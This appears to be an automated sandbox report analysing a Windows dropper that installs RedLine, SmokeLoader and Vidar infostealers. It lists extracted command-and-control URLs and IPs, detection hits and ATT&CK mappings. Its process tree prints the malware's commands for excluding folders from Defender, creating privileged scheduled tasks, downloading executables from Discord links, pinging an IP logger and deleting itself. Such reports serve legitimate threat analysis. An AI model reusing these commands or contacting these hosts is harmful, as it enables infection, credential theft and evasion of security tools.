redline | 071f6bd61aef9f209be1bfb16ef1fb14bd44804fcab511b129deeb7822948ef9

Resubmissions

28/09/2021, 20:51

210928-zm5pdsdae8 10

28/09/2021, 20:22

210928-y5kaqsdaa9 10

Analysis

max time kernel
20s
max time network
1792s
platform
windows7_x64
resource
win7-ja-20210920
submitted
28/09/2021, 20:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Size

3.9MB
MD5

1be0d2741eaac6804e24a7586b1086b0
SHA1

cdb330156b2063c6f259cb10a787463756798f7a
SHA256

071f6bd61aef9f209be1bfb16ef1fb14bd44804fcab511b129deeb7822948ef9
SHA512

cc9352b0ace0a51cac07069adf33d98e548e6726e71bf4582dcb15c3d7b0a7806765ffc57f95511f1aeca798d7fbf44c08bc5ebe7bc13626b8b7bcd0df872f85

Score

10^/10

redline smokeloader vidar 2k ruzzki 706 aspackv2 backdoor infostealer spyware stealer themida trojan

Malware Config

Extracted

Family

vidar

Version

40.1

Botnet

706

https://eduarroma.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

87.251.71.44:80

Extracted

Family

redline

Botnet

2k ruzzki

narlelalik.xyz:12509

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

resource	yara_rule
behavioral1/memory/308-244-0x0000000006FD0000-0x000000000700A000-memory.dmp	family_redline
behavioral1/memory/1352-245-0x00000000008C0000-0x00000000008DF000-memory.dmp	family_redline
behavioral1/memory/1352-247-0x0000000000AB0000-0x0000000000ACE000-memory.dmp	family_redline
behavioral1/memory/308-248-0x0000000007060000-0x0000000007099000-memory.dmp	family_redline
behavioral1/memory/2656-288-0x000000000041C5DE-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral1/memory/1304-161-0x0000000000400000-0x0000000002403000-memory.dmp	family_vidar
behavioral1/memory/1304-160-0x0000000000320000-0x00000000003BD000-memory.dmp	family_vidar
behavioral1/memory/1076-316-0x0000000000400000-0x0000000002BFB000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0006000000012634-63.dat	aspack_v212_v242
behavioral1/files/0x0006000000012616-65.dat	aspack_v212_v242
behavioral1/files/0x0006000000012616-64.dat	aspack_v212_v242
behavioral1/files/0x0006000000012634-62.dat	aspack_v212_v242
behavioral1/files/0x0005000000012683-69.dat	aspack_v212_v242
behavioral1/files/0x0005000000012683-68.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
1696	setup_install.exe
1000	Thu02483b39590da5492.exe
1304	Thu02966ca5c58f270.exe
1712	Thu02f60acc90a3.exe
2012	Thu0247e977c7950492a.exe
1988	Thu02c015332704.exe
1708	Thu0299d0d70a4d322.exe
1320	Thu02d385ff55.exe
1744	Thu0247e977c7950492a.exe

Loads dropped DLL 32 IoCs

pid	Process
1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
1696	setup_install.exe
1696	setup_install.exe
1696	setup_install.exe
1696	setup_install.exe
1696	setup_install.exe
1696	setup_install.exe
1696	setup_install.exe
1696	setup_install.exe
456	cmd.exe
1944	cmd.exe
1944	cmd.exe
1548	cmd.exe
1548	cmd.exe
668	cmd.exe
1876	cmd.exe
1876	cmd.exe
384	cmd.exe
1304	Thu02966ca5c58f270.exe
1304	Thu02966ca5c58f270.exe
1168	cmd.exe
2012	Thu0247e977c7950492a.exe
2012	Thu0247e977c7950492a.exe
1708	Thu0299d0d70a4d322.exe
1708	Thu0299d0d70a4d322.exe
1320	Thu02d385ff55.exe
1320	Thu02d385ff55.exe
2012	Thu0247e977c7950492a.exe
1744	Thu0247e977c7950492a.exe
1744	Thu0247e977c7950492a.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2064-253-0x00000000003F0000-0x00000000003F1000-memory.dmp	themida
behavioral1/memory/2844-257-0x00000000001D0000-0x00000000001D1000-memory.dmp	themida

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
219	api.db-ip.com
220	api.db-ip.com
13	ip-api.com
45	ipinfo.io
46	ipinfo.io
208	ipinfo.io
209	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1684	1304	WerFault.exe	46
1780	1076	WerFault.exe	56

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu0299d0d70a4d322.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu0299d0d70a4d322.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Thu0299d0d70a4d322.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3320	schtasks.exe
3344	schtasks.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3208	taskkill.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
1708	Thu0299d0d70a4d322.exe
1708	Thu0299d0d70a4d322.exe
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found
1364	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1708	Thu0299d0d70a4d322.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1512 wrote to memory of 1696	1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	28
PID 1512 wrote to memory of 1696	1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	28
PID 1512 wrote to memory of 1696	1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	28
PID 1512 wrote to memory of 1696	1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	28
PID 1512 wrote to memory of 1696	1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	28
PID 1512 wrote to memory of 1696	1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	28
PID 1512 wrote to memory of 1696	1512	071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe	28
PID 1696 wrote to memory of 1452	1696	setup_install.exe	30
PID 1696 wrote to memory of 1452	1696	setup_install.exe	30
PID 1696 wrote to memory of 1452	1696	setup_install.exe	30
PID 1696 wrote to memory of 1452	1696	setup_install.exe	30
PID 1696 wrote to memory of 1452	1696	setup_install.exe	30
PID 1696 wrote to memory of 1452	1696	setup_install.exe	30
PID 1696 wrote to memory of 1452	1696	setup_install.exe	30
PID 1696 wrote to memory of 1548	1696	setup_install.exe	49
PID 1696 wrote to memory of 1548	1696	setup_install.exe	49
PID 1696 wrote to memory of 1548	1696	setup_install.exe	49
PID 1696 wrote to memory of 1548	1696	setup_install.exe	49
PID 1696 wrote to memory of 1548	1696	setup_install.exe	49
PID 1696 wrote to memory of 1548	1696	setup_install.exe	49
PID 1696 wrote to memory of 1548	1696	setup_install.exe	49
PID 1696 wrote to memory of 1876	1696	setup_install.exe	37
PID 1696 wrote to memory of 1876	1696	setup_install.exe	37
PID 1696 wrote to memory of 1876	1696	setup_install.exe	37
PID 1696 wrote to memory of 1876	1696	setup_install.exe	37
PID 1696 wrote to memory of 1876	1696	setup_install.exe	37
PID 1696 wrote to memory of 1876	1696	setup_install.exe	37
PID 1696 wrote to memory of 1876	1696	setup_install.exe	37
PID 1696 wrote to memory of 456	1696	setup_install.exe	32
PID 1696 wrote to memory of 456	1696	setup_install.exe	32
PID 1696 wrote to memory of 456	1696	setup_install.exe	32
PID 1696 wrote to memory of 456	1696	setup_install.exe	32
PID 1696 wrote to memory of 456	1696	setup_install.exe	32
PID 1696 wrote to memory of 456	1696	setup_install.exe	32
PID 1696 wrote to memory of 456	1696	setup_install.exe	32
PID 1696 wrote to memory of 1944	1696	setup_install.exe	31
PID 1696 wrote to memory of 1944	1696	setup_install.exe	31
PID 1696 wrote to memory of 1944	1696	setup_install.exe	31
PID 1696 wrote to memory of 1944	1696	setup_install.exe	31
PID 1696 wrote to memory of 1944	1696	setup_install.exe	31
PID 1696 wrote to memory of 1944	1696	setup_install.exe	31
PID 1696 wrote to memory of 1944	1696	setup_install.exe	31
PID 1696 wrote to memory of 2032	1696	setup_install.exe	34
PID 1696 wrote to memory of 2032	1696	setup_install.exe	34
PID 1696 wrote to memory of 2032	1696	setup_install.exe	34
PID 1696 wrote to memory of 2032	1696	setup_install.exe	34
PID 1696 wrote to memory of 2032	1696	setup_install.exe	34
PID 1696 wrote to memory of 2032	1696	setup_install.exe	34
PID 1696 wrote to memory of 2032	1696	setup_install.exe	34
PID 1696 wrote to memory of 1168	1696	setup_install.exe	33
PID 1696 wrote to memory of 1168	1696	setup_install.exe	33
PID 1696 wrote to memory of 1168	1696	setup_install.exe	33
PID 1696 wrote to memory of 1168	1696	setup_install.exe	33
PID 1696 wrote to memory of 1168	1696	setup_install.exe	33
PID 1696 wrote to memory of 1168	1696	setup_install.exe	33
PID 1696 wrote to memory of 1168	1696	setup_install.exe	33
PID 1696 wrote to memory of 668	1696	setup_install.exe	35
PID 1696 wrote to memory of 668	1696	setup_install.exe	35
PID 1696 wrote to memory of 668	1696	setup_install.exe	35
PID 1696 wrote to memory of 668	1696	setup_install.exe	35
PID 1696 wrote to memory of 668	1696	setup_install.exe	35
PID 1696 wrote to memory of 668	1696	setup_install.exe	35
PID 1696 wrote to memory of 668	1696	setup_install.exe	35
PID 1696 wrote to memory of 1948	1696	setup_install.exe	36

C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
"C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1512
- C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    PID:1452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02966ca5c58f270.exe
    3⤵
    - Loads dropped DLL
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu02966ca5c58f270.exe
      Thu02966ca5c58f270.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1304
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1304 -s 936
        5⤵
        Program crash
        
        PID:1684
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02483b39590da5492.exe
    3⤵
    - Loads dropped DLL
    PID:456
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu02483b39590da5492.exe
      Thu02483b39590da5492.exe
      4⤵
      Executes dropped EXE
      PID:1000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02d385ff55.exe
    3⤵
    - Loads dropped DLL
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu02d385ff55.exe
      Thu02d385ff55.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1320
    - - C:\Users\Admin\Documents\KHV2GvXXCdoWfoSJzSUWzT3s.exe
        
        "C:\Users\Admin\Documents\KHV2GvXXCdoWfoSJzSUWzT3s.exe"
        5⤵
        
        PID:864
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:3320
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        6⤵
        Creates scheduled task(s)
        
        PID:3344
    - - C:\Users\Admin\Documents\r2SbVa0hVKZVlkHQyCKOz5zF.exe
        
        "C:\Users\Admin\Documents\r2SbVa0hVKZVlkHQyCKOz5zF.exe"
        5⤵
        
        PID:1076
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 928
        6⤵
        Program crash
        
        PID:1780
    - - C:\Users\Admin\Documents\rwN44JErlii1HpkSvJNJndEY.exe
        
        "C:\Users\Admin\Documents\rwN44JErlii1HpkSvJNJndEY.exe"
        5⤵
        
        PID:1724
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "rwN44JErlii1HpkSvJNJndEY.exe" /f & erase "C:\Users\Admin\Documents\rwN44JErlii1HpkSvJNJndEY.exe" & exit
        6⤵
        
        PID:2604
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "rwN44JErlii1HpkSvJNJndEY.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:3208
    - - C:\Users\Admin\Documents\zulDahxLQ7xlK1urDddI4gMA.exe
        
        "C:\Users\Admin\Documents\zulDahxLQ7xlK1urDddI4gMA.exe"
        5⤵
        
        PID:1312
    - - C:\Users\Admin\Documents\5BLyWyTos0fTKPvh39KHa9hg.exe
        
        "C:\Users\Admin\Documents\5BLyWyTos0fTKPvh39KHa9hg.exe"
        5⤵
        
        PID:2180
    - - C:\Users\Admin\Documents\EVTfXLg1rjSns5kwkPoWiPZ2.exe
        
        "C:\Users\Admin\Documents\EVTfXLg1rjSns5kwkPoWiPZ2.exe"
        5⤵
        
        PID:2168
    - - C:\Users\Admin\Documents\N4jKld8EPVStTN0NuavL_4EZ.exe
        
        "C:\Users\Admin\Documents\N4jKld8EPVStTN0NuavL_4EZ.exe"
        5⤵
        
        PID:2156
    - - C:\Users\Admin\Documents\28xpefvEeRj3WuM1ltm21d18.exe
        
        "C:\Users\Admin\Documents\28xpefvEeRj3WuM1ltm21d18.exe"
        5⤵
        
        PID:2144
    - - C:\Users\Admin\Documents\sVIVEjbDbKvAjvDXXnFbQjJN.exe
        
        "C:\Users\Admin\Documents\sVIVEjbDbKvAjvDXXnFbQjJN.exe"
        5⤵
        
        PID:832
    - - C:\Users\Admin\Documents\DnBdYG6dksMNSg66sjLozwMF.exe
        
        "C:\Users\Admin\Documents\DnBdYG6dksMNSg66sjLozwMF.exe"
        5⤵
        
        PID:2080
    - - C:\Users\Admin\Documents\Vyfh62014pPzBck3dfc4u2b4.exe
        
        "C:\Users\Admin\Documents\Vyfh62014pPzBck3dfc4u2b4.exe"
        5⤵
        
        PID:2072
    - - C:\Users\Admin\Documents\nrqo53uoFyph2t77hZs7igic.exe
        
        "C:\Users\Admin\Documents\nrqo53uoFyph2t77hZs7igic.exe"
        5⤵
        
        PID:2064
    - - C:\Users\Admin\Documents\CjYW8bDxaXnI4tljgpji5kt5.exe
        
        "C:\Users\Admin\Documents\CjYW8bDxaXnI4tljgpji5kt5.exe"
        5⤵
        
        PID:436
    - - C:\Users\Admin\Documents\Rbm16b9v1k3s4kN4rxy3mGaE.exe
        
        "C:\Users\Admin\Documents\Rbm16b9v1k3s4kN4rxy3mGaE.exe"
        5⤵
        
        PID:2056
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:2288
    - - C:\Users\Admin\Documents\qpnSMb1Cbiwuy_KBWLAsf_R1.exe
        
        "C:\Users\Admin\Documents\qpnSMb1Cbiwuy_KBWLAsf_R1.exe"
        5⤵
        
        PID:920
    - - C:\Users\Admin\Documents\SKAG3dmR3vP6b_6y5JOvZ878.exe
        
        "C:\Users\Admin\Documents\SKAG3dmR3vP6b_6y5JOvZ878.exe"
        5⤵
        
        PID:308
    - - C:\Users\Admin\Documents\2d5ULCVpeVIFnXQy5ATGDysG.exe
        
        "C:\Users\Admin\Documents\2d5ULCVpeVIFnXQy5ATGDysG.exe"
        5⤵
        
        PID:1260
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AD5E.tmp\AD6E.tmp\AD6F.bat C:\Users\Admin\Documents\2d5ULCVpeVIFnXQy5ATGDysG.exe"
        6⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\AD5E.tmp\AD6E.tmp\extd.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD5E.tmp\AD6E.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/890550701829259356/exe.exe" "exe.exe" "" "" "" "" "" ""
        7⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\AD5E.tmp\AD6E.tmp\extd.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD5E.tmp\AD6E.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/889574700513107980/892465432404054046/1.exe" "1.exe" "" "" "" "" "" ""
        7⤵
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\3534\1.exe
        
        1.exe
        7⤵
        
        PID:1124
        
        C:\Users\Admin\AppData\Local\Temp\AD5E.tmp\AD6E.tmp\extd.exe
        
        C:\Users\Admin\AppData\Local\Temp\AD5E.tmp\AD6E.tmp\extd.exe "" "" "" "" "" "" "" "" ""
        7⤵
        
        PID:2016
    - - C:\Users\Admin\Documents\kIzxuPJLbWSo08E0wyv4rDjQ.exe
        
        "C:\Users\Admin\Documents\kIzxuPJLbWSo08E0wyv4rDjQ.exe"
        5⤵
        
        PID:2088
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c start "" "210921.exe" & start "" "269new.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"
        6⤵
        
        PID:2636
        
        C:\Users\Admin\AppData\Local\Temp\210921.exe
        
        "210921.exe"
        7⤵
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\269new.exe
        
        "269new.exe"
        7⤵
        
        PID:2944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"
        7⤵
        
        PID:2132
    - - C:\Users\Admin\Documents\mNGEIM4Ej4KDSZsbEYJbTOmp.exe
        
        "C:\Users\Admin\Documents\mNGEIM4Ej4KDSZsbEYJbTOmp.exe"
        5⤵
        
        PID:240
      - C:\Users\Admin\Documents\mNGEIM4Ej4KDSZsbEYJbTOmp.exe
        
        C:\Users\Admin\Documents\mNGEIM4Ej4KDSZsbEYJbTOmp.exe
        6⤵
        
        PID:2656
    - - C:\Users\Admin\Documents\ZZYc52N7Db2Z5zXE_siXgCVz.exe
        
        "C:\Users\Admin\Documents\ZZYc52N7Db2Z5zXE_siXgCVz.exe"
        5⤵
        
        PID:868
    - - C:\Users\Admin\Documents\lo0UBlVodILh3i8MzO1O8Mo3.exe
        
        "C:\Users\Admin\Documents\lo0UBlVodILh3i8MzO1O8Mo3.exe"
        5⤵
        
        PID:1352
    - - C:\Users\Admin\Documents\6DEUhT4fmTTxZJqT_yekJKCN.exe
        
        "C:\Users\Admin\Documents\6DEUhT4fmTTxZJqT_yekJKCN.exe"
        5⤵
        
        PID:1348
    - - C:\Users\Admin\Documents\3We7O8s7pdN9kWUK09EmhCQ6.exe
        
        "C:\Users\Admin\Documents\3We7O8s7pdN9kWUK09EmhCQ6.exe"
        5⤵
        
        PID:1732
    - - C:\Users\Admin\Documents\LT0E9_I3X6l0Qw_1TLhdFNbG.exe
        
        "C:\Users\Admin\Documents\LT0E9_I3X6l0Qw_1TLhdFNbG.exe"
        5⤵
        
        PID:2252
    - - C:\Users\Admin\Documents\0m7pAE3JgpepF8Xm9wjktNND.exe
        
        "C:\Users\Admin\Documents\0m7pAE3JgpepF8Xm9wjktNND.exe"
        5⤵
        
        PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02588bdad8e7.exe
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02f60acc90a3.exe
    3⤵
    - Loads dropped DLL
    PID:668
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu02f60acc90a3.exe
      Thu02f60acc90a3.exe
      4⤵
      Executes dropped EXE
      PID:1712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02bfe1521bcc038.exe
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu0299d0d70a4d322.exe
    3⤵
    - Loads dropped DLL
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu0299d0d70a4d322.exe
      Thu0299d0d70a4d322.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu02c015332704.exe
    3⤵
    - Loads dropped DLL
    PID:384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Thu0247e977c7950492a.exe
    3⤵
    - Loads dropped DLL
    PID:1548

C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu0247e977c7950492a.exe
Thu0247e977c7950492a.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2012
- C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu0247e977c7950492a.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu0247e977c7950492a.exe" -a
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:1744

C:\Users\Admin\AppData\Local\Temp\7zS8E54CA33\Thu02c015332704.exe
Thu02c015332704.exe
1⤵
- Executes dropped EXE
PID:1988

C:\Windows\system32\taskeng.exe
taskeng.exe {1FCDDB7F-89F5-42D3-90A3-F3683F6D32A9} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:3184
- C:\Users\Admin\AppData\Roaming\atcdjiu
  C:\Users\Admin\AppData\Roaming\atcdjiu
  2⤵
  PID:3308
- C:\Program Files\Mozilla Firefox\default-browser-agent.exe
  "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
  2⤵
  PID:3568
- C:\Users\Admin\AppData\Roaming\atcdjiu
  C:\Users\Admin\AppData\Roaming\atcdjiu
  2⤵
  PID:2512

C:\Windows\system32\taskeng.exe
taskeng.exe {21102134-D232-4871-9E68-CE8623D63B1F} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3352

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/240-242-0x0000000000960000-0x0000000000961000-memory.dmp

Filesize
4KB

Download
memory/240-319-0x0000000002410000-0x0000000002411000-memory.dmp

Filesize
4KB

Download
memory/308-237-0x0000000000300000-0x000000000034F000-memory.dmp

Filesize
316KB

Download
memory/308-311-0x0000000007024000-0x0000000007026000-memory.dmp

Filesize
8KB

Download
memory/308-309-0x0000000007023000-0x0000000007024000-memory.dmp

Filesize
4KB

Download
memory/308-307-0x0000000007022000-0x0000000007023000-memory.dmp

Filesize
4KB

Download
memory/308-305-0x0000000007021000-0x0000000007022000-memory.dmp

Filesize
4KB

Download
memory/308-300-0x0000000000400000-0x0000000002BAB000-memory.dmp

Filesize
39.7MB

Download
memory/308-248-0x0000000007060000-0x0000000007099000-memory.dmp

Filesize
228KB

Download
memory/308-244-0x0000000006FD0000-0x000000000700A000-memory.dmp

Filesize
232KB

Download
memory/1000-171-0x0000000003620000-0x00000000037BB000-memory.dmp

Filesize
1.6MB

Download
memory/1000-167-0x000007FEFB901000-0x000007FEFB903000-memory.dmp

Filesize
8KB

Download
memory/1000-170-0x00000000033A0000-0x0000000003477000-memory.dmp

Filesize
860KB

Download
memory/1076-315-0x0000000003550000-0x0000000005D4B000-memory.dmp

Filesize
40.0MB

Download
memory/1076-316-0x0000000000400000-0x0000000002BFB000-memory.dmp

Filesize
40.0MB

Download
memory/1304-161-0x0000000000400000-0x0000000002403000-memory.dmp

Filesize
32.0MB

Download
memory/1304-160-0x0000000000320000-0x00000000003BD000-memory.dmp

Filesize
628KB

Download
memory/1320-187-0x0000000003C40000-0x0000000003D81000-memory.dmp

Filesize
1.3MB

Download
memory/1352-303-0x0000000000250000-0x0000000000280000-memory.dmp

Filesize
192KB

Download
memory/1352-245-0x00000000008C0000-0x00000000008DF000-memory.dmp

Filesize
124KB

Download
memory/1352-304-0x0000000000400000-0x000000000087E000-memory.dmp

Filesize
4.5MB

Download
memory/1352-310-0x0000000000AF3000-0x0000000000AF4000-memory.dmp

Filesize
4KB

Download
memory/1352-312-0x0000000000AF4000-0x0000000000AF6000-memory.dmp

Filesize
8KB

Download
memory/1352-247-0x0000000000AB0000-0x0000000000ACE000-memory.dmp

Filesize
120KB

Download
memory/1352-306-0x0000000000AF1000-0x0000000000AF2000-memory.dmp

Filesize
4KB

Download
memory/1352-308-0x0000000000AF2000-0x0000000000AF3000-memory.dmp

Filesize
4KB

Download
memory/1364-318-0x00000000026C0000-0x00000000026D6000-memory.dmp

Filesize
88KB

Download
memory/1364-168-0x0000000002960000-0x0000000002976000-memory.dmp

Filesize
88KB

Download
memory/1364-302-0x0000000002680000-0x0000000002696000-memory.dmp

Filesize
88KB

Download
memory/1512-54-0x0000000074E31000-0x0000000074E33000-memory.dmp

Filesize
8KB

Download
memory/1632-175-0x0000000001FA0000-0x0000000002BEA000-memory.dmp

Filesize
12.3MB

Download
memory/1632-179-0x0000000001FA0000-0x0000000002BEA000-memory.dmp

Filesize
12.3MB

Download
memory/1632-166-0x0000000001FA0000-0x0000000002BEA000-memory.dmp

Filesize
12.3MB

Download
memory/1684-186-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/1696-78-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1696-80-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1696-82-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1696-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1696-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1696-90-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1696-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1696-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1696-81-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1696-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1708-165-0x0000000000400000-0x00000000023AF000-memory.dmp

Filesize
31.7MB

Download
memory/1708-164-0x00000000001D0000-0x00000000001D9000-memory.dmp

Filesize
36KB

Download
memory/1712-174-0x000000001ACF0000-0x000000001ACF2000-memory.dmp

Filesize
8KB

Download
